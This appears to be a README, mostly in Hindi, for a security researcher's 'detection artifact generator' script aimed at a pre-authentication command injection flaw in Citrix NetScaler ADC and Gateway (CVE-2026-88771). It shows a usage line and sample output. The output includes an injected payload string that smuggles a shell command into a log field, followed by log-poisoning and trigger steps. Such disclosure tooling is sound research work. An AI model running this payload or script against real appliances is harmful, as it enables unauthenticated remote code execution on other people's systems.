
Citrix NetScaler CVE-2026-88771 के लिए डिटेक्शन आर्टिफैक्ट जनरेटर, जो ADC और Gateway डिप्लॉयमेंट के विरुद्ध रिमोट कोड एक्ज़ीक्यूशन प्राप्त करने के लिए प्री-ऑथ कमांड इंजेक्शन का उपयोग करता है।
Citrix NetScaler CVE-2026-88771 के लिए डिटेक्शन आर्टिफैक्ट जेनरेटर
तकनीकी विवरण के लिए हमारी ब्लॉग पोस्ट देखें।
./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py
(*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-88771]
[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done
कमांड को उठाए जाने में 24 घंटे तक लग सकते हैं साथ ही, फोर्स पिकअप तकनीक शामिल नहीं है
सभी NetScaler ADC और NetScaler Gateway परिनियोजन (डिफ़ॉल्ट कॉन्फ़िगरेशन / किसी अतिरिक्त सुविधा की आवश्यकता नहीं)
प्रभावित संस्करणों की सूची के लिए Citrix की आधिकारिक सलाह देखें।
नवीनतम सुरक्षा शोध के लिए watchTowr Labs टीम को फॉलो करें